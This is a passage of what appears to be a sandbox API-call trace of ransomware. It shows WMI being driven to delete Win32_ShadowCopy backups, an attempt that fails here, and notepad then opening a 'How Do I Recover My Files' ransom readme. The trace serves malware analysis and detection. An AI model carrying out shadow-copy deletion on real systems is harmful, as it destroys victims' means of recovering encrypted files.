dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] malloc (_Size=0xe) returned 0x33cacf8 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] lstrlenW (lpString="GET") returned 3 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0139.884] lstrlenW (lpString="LIST") returned 4 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0139.884] lstrlenW (lpString="SET") returned 3 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0139.884] lstrlenW (lpString="CREATE") returned 6 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0139.885] lstrlenW (lpString="CALL") returned 4 [0139.885] lstrlenW (lpString="delete") returned 6 [0139.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0139.885] lstrlenW (lpString="ASSOC") returned 5 [0139.885] lstrlenW (lpString="delete") returned 6 [0139.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0139.885] lstrlenW (lpString="DELETE") returned 6 [0139.885] lstrlenW (lpString="delete") returned 6 [0139.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0139.885] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0139.885] malloc (_Size=0x3e) returned 0x33cb650 [0139.885] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0139.885] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xe5e7296d | out: _String="Select", _Context=0xe5e7296d) returned="Select" [0139.885] malloc (_Size=0xc) returned 0x33cac98 [0139.885] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xe5e7296d | out: _String=0x0, _Context=0xe5e7296d) returned="*" [0139.885] lstrlenW (lpString="FROM") returned 4 [0139.885] lstrlenW (lpString="*") returned 1 [0139.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0139.885] malloc (_Size=0xc) returned 0x33cacb0 [0139.885] free (_Block=0x33cac98) [0139.885] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xe5e7296d | out: _String=0x0, _Context=0xe5e7296d) returned="from" [0139.885] lstrlenW (lpString="FROM") returned 4 [0139.885] lstrlenW (lpString="from") returned 4 [0139.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0139.885] malloc (_Size=0xc) returned 0x33cace0 [0139.885] free (_Block=0x33cacb0) [0139.885] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xe5e7296d | out: _String=0x0, _Context=0xe5e7296d) returned="Win32_ShadowCopy" [0139.885] malloc (_Size=0xc) returned 0x33cac80 [0139.886] free (_Block=0x33cace0) [0139.886] free (_Block=0x33cb650) [0139.886] free (_Block=0x33cac80) [0139.886] lstrlenW (lpString="SET") returned 3 [0139.886] lstrlenW (lpString="delete") returned 6 [0139.886] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0139.886] lstrlenW (lpString="CREATE") returned 6 [0139.886] lstrlenW (lpString="delete") returned 6 [0139.886] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0139.886] free (_Block=0x33cae08) [0139.886] malloc (_Size=0x4) returned 0x33cae08 [0139.886] lstrlenW (lpString="GET") returned 3 [0139.886] lstrlenW (lpString="delete") returned 6 [0139.886] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0139.886] lstrlenW (lpString="LIST") returned 4 [0139.886] lstrlenW (lpString="delete") returned 6 [0139.886] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0139.886] lstrlenW (lpString="ASSOC") returned 5 [0139.886] lstrlenW (lpString="delete") returned 6 [0139.886] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0139.886] WbemLocator:IUnknown:AddRef (This=0x32236c8) returned 0x3 [0139.886] free (_Block=0x33c11d8) [0139.886] lstrlenW (lpString="") returned 0 [0139.886] lstrlenW (lpString="NQDPDE") returned 6 [0139.886] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0139.886] lstrlenW (lpString="NQDPDE") returned 6 [0139.886] malloc (_Size=0xe) returned 0x33cac38 [0139.886] lstrlenW (lpString="NQDPDE") returned 6 [0139.886] GetCurrentThreadId () returned 0x13cc [0139.886] GetCurrentProcess () returned 0xffffffff [0139.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2eef7f0 | out: TokenHandle=0x2eef7f0*=0x2f8) returned 1 [0139.887] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2eef7ec | out: TokenInformation=0x0, ReturnLength=0x2eef7ec) returned 0 [0139.887] malloc (_Size=0x118) returned 0x33cb650 [0139.887] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x33cb650, TokenInformationLength=0x118, ReturnLength=0x2eef7ec | out: TokenInformation=0x33cb650, ReturnLength=0x2eef7ec) returned 1 [0139.887] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x33cb650*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0139.887] free (_Block=0x33cb650) [0139.887] CloseHandle (hObject=0x2f8) returned 1 [0139.887] lstrlenW (lpString="GET") returned 3 [0139.887] lstrlenW (lpString="delete") returned 6 [0139.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0139.887] lstrlenW (lpString="LIST") returned 4 [0139.887] lstrlenW (lpString="delete") returned 6 [0139.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0139.887] lstrlenW (lpString="SET") returned 3 [0139.887] lstrlenW (lpString="delete") returned 6 [0139.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0139.887] lstrlenW (lpString="CALL") returned 4 [0139.887] lstrlenW (lpString="delete") returned 6 [0139.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0139.887] lstrlenW (lpString="ASSOC") returned 5 [0139.887] lstrlenW (lpString="delete") returned 6 [0139.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0139.887] lstrlenW (lpString="CREATE") returned 6 [0139.887] lstrlenW (lpString="delete") returned 6 [0139.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0139.887] lstrlenW (lpString="DELETE") returned 6 [0139.887] lstrlenW (lpString="delete") returned 6 [0139.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0139.887] malloc (_Size=0xc) returned 0x33cac50 [0139.888] lstrlenA (lpString="") returned 0 [0139.888] malloc (_Size=0x2) returned 0x33c11d8 [0139.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xdb2b74, cbMultiByte=-1, lpWideCharStr=0x33c11d8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0139.888] free (_Block=0x33c11d8) [0139.888] malloc (_Size=0xc) returned 0x33cac98 [0139.888] lstrlenA (lpString="") returned 0 [0139.888] malloc (_Size=0x2) returned 0x33c11d8 [0139.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xdb2b74, cbMultiByte=-1, lpWideCharStr=0x33c11d8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0139.888] free (_Block=0x33c11d8) [0139.888] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0139.888] malloc (_Size=0x3e) returned 0x33cb650 [0139.888] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0139.888] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xe5e72935 | out: _String="Select", _Context=0xe5e72935) returned="Select" [0139.888] malloc (_Size=0xc) returned 0x33cac68 [0139.888] free (_Block=0x33cac98) [0139.888] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xe5e72935 | out: _String=0x0, _Context=0xe5e72935) returned="*" [0139.888] lstrlenW (lpString="FROM") returned 4 [0139.888] lstrlenW (lpString="*") returned 1 [0139.888] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0139.888] malloc (_Size=0xc) returned 0x33cacb0 [0139.888] free (_Block=0x33cac68) [0139.888] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xe5e72935 | out: _String=0x0, _Context=0xe5e72935) returned="from" [0139.888] lstrlenW (lpString="FROM") returned 4 [0139.888] lstrlenW (lpString="from") returned 4 [0139.888] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0139.888] malloc (_Size=0xc) returned 0x33cace0 [0139.888] free (_Block=0x33cacb0) [0139.889] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xe5e72935 | out: _String=0x0, _Context=0xe5e72935) returned="Win32_ShadowCopy" [0139.889] malloc (_Size=0xc) returned 0x33cac98 [0139.889] free (_Block=0x33cace0) [0139.889] free (_Block=0x33cb650) [0139.889] malloc (_Size=0xc) returned 0x33cac68 [0140.067] malloc (_Size=0xc) returned 0x33cac80 [0140.067] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0140.067] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0140.067] free (_Block=0x33cac50) [0140.068] free (_Block=0x33cac68) [0140.068] ??0CHString@@QAE@XZ () returned 0x2eef790 [0140.068] GetCurrentThreadId () returned 0x13cc [0140.068] malloc (_Size=0xc) returned 0x33cacb0 [0140.068] malloc (_Size=0xc) returned 0x33cac50 [0140.068] malloc (_Size=0xc) returned 0x33cac68 [0140.068] malloc (_Size=0xc) returned 0x33cace0 [0140.068] malloc (_Size=0xc) returned 0x33ca9c8 [0140.068] SysStringLen (param_1="\\\\") returned 0x2 [0140.068] SysStringLen (param_1="NQDPDE") returned 0x6 [0140.068] malloc (_Size=0xc) returned 0x33cab18 [0140.068] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0140.068] SysStringLen (param_1="\\") returned 0x1 [0140.068] malloc (_Size=0xc) returned 0x33cab30 [0140.068] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0140.068] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0140.068] free (_Block=0x33cab18) [0140.068] free (_Block=0x33ca9c8) [0140.068] free (_Block=0x33cace0) [0140.068] free (_Block=0x33cac68) [0140.068] free (_Block=0x33cac50) [0140.068] free (_Block=0x33cacb0) [0140.069] malloc (_Size=0xc) returned 0x33cac50 [0140.069] malloc (_Size=0xc) returned 0x33cacb0 [0140.069] malloc (_Size=0xc) returned 0x33cac68 [0140.069] WbemLocator:IWbemLocator:ConnectServer (in: This=0x32236c8, strNetworkResource="\\\\NQDPDE\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xdf8564 | out: ppNamespace=0xdf8564*=0x3258ac8) returned 0x0 [0141.272] free (_Block=0x33cac68) [0141.272] free (_Block=0x33cacb0) [0141.272] free (_Block=0x33cac50) [0141.273] CoSetProxyBlanket (pProxy=0x3258ac8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0141.273] free (_Block=0x33cab30) [0141.273] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0141.273] ??0CHString@@QAE@XZ () returned 0x2eef780 [0141.273] GetCurrentThreadId () returned 0x13cc [0141.273] malloc (_Size=0xc) returned 0x33ca9c8 [0141.273] lstrlenA (lpString="") returned 0 [0141.273] malloc (_Size=0x2) returned 0x33c11d8 [0141.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xdb2b74, cbMultiByte=-1, lpWideCharStr=0x33c11d8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0141.273] free (_Block=0x33c11d8) [0141.273] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0141.273] SysStringLen (param_1="") returned 0x0 [0141.273] free (_Block=0x33ca9c8) [0141.273] malloc (_Size=0xc) returned 0x33ca9c8 [0141.273] IWbemServices:ExecQuery (in: This=0x3258ac8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x2eef77c | out: ppEnum=0x2eef77c*=0x0) returned 0x80041014 [0161.054] free (_Block=0x33ca9c8) [0161.055] _CxxThrowException () [0161.056] malloc (_Size=0x10) returned 0x33cab18 [0161.056] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0161.056] free (_Block=0x33cac98) [0161.056] free (_Block=0x33cac80) [0161.057] GetCurrentThreadId () returned 0x13cc [0161.057] ??0CHString@@QAE@PBG@Z () returned 0x2eef820 [0161.057] ??YCHString@@QAEABV0@PBG@Z () returned 0x2eef820 [0161.057] ??0CHString@@QAE@XZ () returned 0x2eef6ec [0161.057] malloc (_Size=0xc) returned 0x33cac80 [0161.057] malloc (_Size=0xc) returned 0x33cac50 [0161.057] SysStringLen (param_1="") returned 0x0 [0161.058] free (_Block=0x33cac80) [0161.058] CoCreateInstance (in: rclsid=0xdb6a14*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xdb6a24*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xdf857c | out: ppv=0xdf857c*=0x322b8d8) returned 0x0 [0161.063] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x322b8d8, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x2eef6f0 | out: MessageText=0x2eef6f0*="Initialization failure\r\n") returned 0x0 [0161.064] free (_Block=0x33cac50) [0161.064] malloc (_Size=0xc) returned 0x33cac50 [0161.065] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x322b8d8, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x2eef6f4 | out: MessageText=0x2eef6f4*="WMI") returned 0x0 [0161.065] malloc (_Size=0xc) returned 0x33cace0 [0161.065] lstrlenW (lpString="WMI") returned 3 [0161.065] lstrlenW (lpString="Wbem") returned 4 [0161.065] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0161.065] lstrlenW (lpString="WMI") returned 3 [0161.065] lstrlenW (lpString="WMI") returned 3 [0161.065] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0161.065] WbemStatusCodeText:IUnknown:Release (This=0x322b8d8) returned 0x0 [0161.065] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0161.065] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x2eeef4c, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0161.065] FormatMessageW (in: dwFlags=0x2500, lpSource=0x2eeef4c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x2eeef34, nSize=0x0, Arguments=0x2eeef38 | out: lpBuffer="蜠̦恜̤") returned 0x2e [0161.066] malloc (_Size=0xc) returned 0x33cac98 [0161.066] LocalFree (hMem=0x3268720) returned 0x0 [0161.066] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0161.067] malloc (_Size=0x2f) returned 0x33cb750 [0161.067] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x33cb750, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0161.067] __iob_func () returned 0x776f2608 [0161.067] fprintf (in: _File=0x776f2648, _Format="%s" | out: _File=0x776f2648) returned 46 [0161.424] __iob_func () returned 0x776f2608 [0161.424] fflush (in: _File=0x776f2648 | out: _File=0x776f2648) returned 0 [0161.424] free (_Block=0x33cb750) [0161.424] free (_Block=0x33cac98) [0161.424] free (_Block=0x33cace0) [0161.424] free (_Block=0x33cac50) [0161.424] ??1CHString@@QAE@XZ () returned 0x1 [0161.424] ??0CHString@@QAE@PBG@Z () returned 0x2eef828 [0161.424] ??YCHString@@QAEABV0@PBG@Z () returned 0x2eef828 [0161.424] GetCurrentThreadId () returned 0x13cc [0161.424] ??1CHString@@QAE@XZ () returned 0x1 [0161.424] WbemLocator:IUnknown:Release (This=0x3258ac8) returned 0x0 [0161.425] ?Empty@CHString@@QAEXXZ () returned 0x6bf465f8 [0161.425] free (_Block=0x33cab18) [0161.425] _kbhit () returned 0x0 [0161.696] free (_Block=0x33cae08) [0161.696] free (_Block=0x33caa58) [0161.696] free (_Block=0x33cab00) [0161.696] free (_Block=0x33ca980) [0161.696] free (_Block=0x33cac20) [0161.696] free (_Block=0x33cad98) [0161.696] free (_Block=0x33c2ad0) [0161.696] free (_Block=0x33cb618) [0161.696] free (_Block=0x33cacf8) [0161.696] free (_Block=0x33cb598) [0161.696] free (_Block=0x33cacc8) [0161.696] free (_Block=0x33c2b50) [0161.696] free (_Block=0x33cb608) [0161.696] free (_Block=0x33c0508) [0161.696] free (_Block=0x33cb5e0) [0161.696] ?Empty@CHString@@QAEXXZ () returned 0x6bf465f8 [0161.696] free (_Block=0x33cadd0) [0161.696] free (_Block=0x33c2af0) [0161.696] free (_Block=0x33ca998) [0161.697] free (_Block=0x33c2598) [0161.697] free (_Block=0x33c25e0) [0161.697] free (_Block=0x33c2628) [0161.697] free (_Block=0x33cac38) [0161.697] free (_Block=0x33c26c0) [0161.697] free (_Block=0x33c04f0) [0161.697] free (_Block=0x33c28f0) [0161.697] free (_Block=0x33c04d8) [0161.697] free (_Block=0x33c2bd0) [0161.697] free (_Block=0x33c04a0) [0161.697] free (_Block=0x33c04b8) [0161.697] free (_Block=0x33c2800) [0161.697] free (_Block=0x33c2818) [0161.697] free (_Block=0x33c27c8) [0161.697] free (_Block=0x33c27e0) [0161.697] free (_Block=0x33c2838) [0161.697] free (_Block=0x33c2850) [0161.697] free (_Block=0x33c2870) [0161.697] free (_Block=0x33c2888) [0161.697] free (_Block=0x33c2758) [0161.697] free (_Block=0x33c2770) [0161.697] free (_Block=0x33c2720) [0161.697] free (_Block=0x33c2738) [0161.697] free (_Block=0x33c2790) [0161.697] free (_Block=0x33c27a8) [0161.697] free (_Block=0x33c26e8) [0161.697] free (_Block=0x33c2700) [0161.697] free (_Block=0x33c2698) [0161.697] free (_Block=0x33c2670) [0161.697] free (_Block=0x33cad10) [0161.698] WbemLocator:IUnknown:Release (This=0x32236c8) returned 0x2 [0161.698] WbemLocator:IUnknown:Release (This=0x3258d48) returned 0x0 [0161.698] WbemLocator:IUnknown:Release (This=0x322afb0) returned 0x0 [0161.699] WbemLocator:IUnknown:Release (This=0x32236c8) returned 0x1 [0161.699] ?Empty@CHString@@QAEXXZ () returned 0x6bf465f8 [0161.699] WbemLocator:IUnknown:Release (This=0x32236c8) returned 0x0 [0161.699] free (_Block=0x33caab8) [0161.699] free (_Block=0x33caa28) [0161.699] free (_Block=0x33c2a50) [0161.699] free (_Block=0x33caae8) [0161.699] free (_Block=0x33cabd8) [0161.699] free (_Block=0x33c2ab0) [0161.699] free (_Block=0x33cab60) [0161.699] free (_Block=0x33ca9b0) [0161.699] free (_Block=0x33c2c30) [0161.699] free (_Block=0x33caa40) [0161.699] free (_Block=0x33caaa0) [0161.699] free (_Block=0x33c29b0) [0161.699] free (_Block=0x33ca938) [0161.699] free (_Block=0x33caa10) [0161.699] free (_Block=0x33c2a10) [0161.699] free (_Block=0x33caa88) [0161.699] free (_Block=0x33cabf0) [0161.699] free (_Block=0x33c2930) [0161.700] free (_Block=0x33cac08) [0161.700] free (_Block=0x33cab78) [0161.700] free (_Block=0x33c28d0) [0161.700] free (_Block=0x33cab90) [0161.700] free (_Block=0x33ca968) [0161.700] free (_Block=0x33c2c70) [0161.700] free (_Block=0x33c9710) [0161.700] free (_Block=0x33caba8) [0161.700] free (_Block=0x33c2990) [0161.700] free (_Block=0x33caad0) [0161.700] free (_Block=0x33caa70) [0161.700] free (_Block=0x33c2c50) [0161.700] free (_Block=0x33cabc0) [0161.700] free (_Block=0x33ca9f8) [0161.700] free (_Block=0x33c2a30) [0161.700] free (_Block=0x33ca9e0) [0161.700] free (_Block=0x33ca950) [0161.700] free (_Block=0x33c2bb0) [0161.700] free (_Block=0x33c9608) [0161.700] free (_Block=0x33c9620) [0161.700] free (_Block=0x33c2970) [0161.700] free (_Block=0x33c9758) [0161.700] free (_Block=0x33c9728) [0161.700] free (_Block=0x33c2c10) [0161.700] free (_Block=0x33c9650) [0161.700] free (_Block=0x33c96c8) [0161.701] free (_Block=0x33c2bf0) [0161.701] free (_Block=0x33c9788) [0161.701] free (_Block=0x33c9668) [0161.701] free (_Block=0x33c29f0) [0161.701] free (_Block=0x33c9638) [0161.701] free (_Block=0x33c96b0) [0161.701] free (_Block=0x33c29d0) [0161.701] free (_Block=0x33c9698) [0161.701] free (_Block=0x33c95c0) [0161.701] free (_Block=0x33c2a70) [0161.701] free (_Block=0x33c9740) [0161.701] free (_Block=0x33c9770) [0161.701] free (_Block=0x33c2910) [0161.701] free (_Block=0x33c95d8) [0161.701] free (_Block=0x33c95f0) [0161.701] free (_Block=0x33c2950) [0161.701] free (_Block=0x33c96e0) [0161.701] free (_Block=0x33c96f8) [0161.701] free (_Block=0x33c2a90) [0161.701] CoUninitialize () [0163.195] exit (_Code=-2147217388) [0163.196] free (_Block=0x33c2d38) [0163.196] free (_Block=0x33c0fe0) [0163.196] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0163.196] free (_Block=0x33c0550) [0163.196] free (_Block=0x33c26d8) [0163.196] free (_Block=0x33c0fc0) [0163.196] free (_Block=0x33c0fa0) [0163.196] free (_Block=0x33c0f70) [0163.196] free (_Block=0x33c0f50) [0163.196] free (_Block=0x33c0f20) [0163.196] free (_Block=0x33c0ee0) [0163.196] free (_Block=0x33c0ec0) [0163.196] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0163.196] free (_Block=0x33cae18) Thread: id = 70 os_tid = 0x13a4 Thread: id = 85 os_tid = 0x1114 Thread: id = 86 os_tid = 0x1150 Thread: id = 87 os_tid = 0x113c Process: id = "14" image_name = "notepad.exe" filename = "c:\\windows\\syswow64\\notepad.exe" page_root = "0x11517000" os_pid = "0x1134" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1344" cmd_line = "\"C:\\WINDOWS\\system32\\NOTEPAD.EXE\" C:\\How Do I Recover My Files (Readme).txt" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 89 os_tid = 0x760 Thread: id = 90 os_tid = 0x1128 Thread: id = 91 os_tid = 0x116c Thread: id = 93 os_tid = 0xe98 Thread: id = 211 os_tid = 0xf4c Thread: id = 212 os_tid = 0x1274 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x742fe000" os_pid = "0x3ac" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT 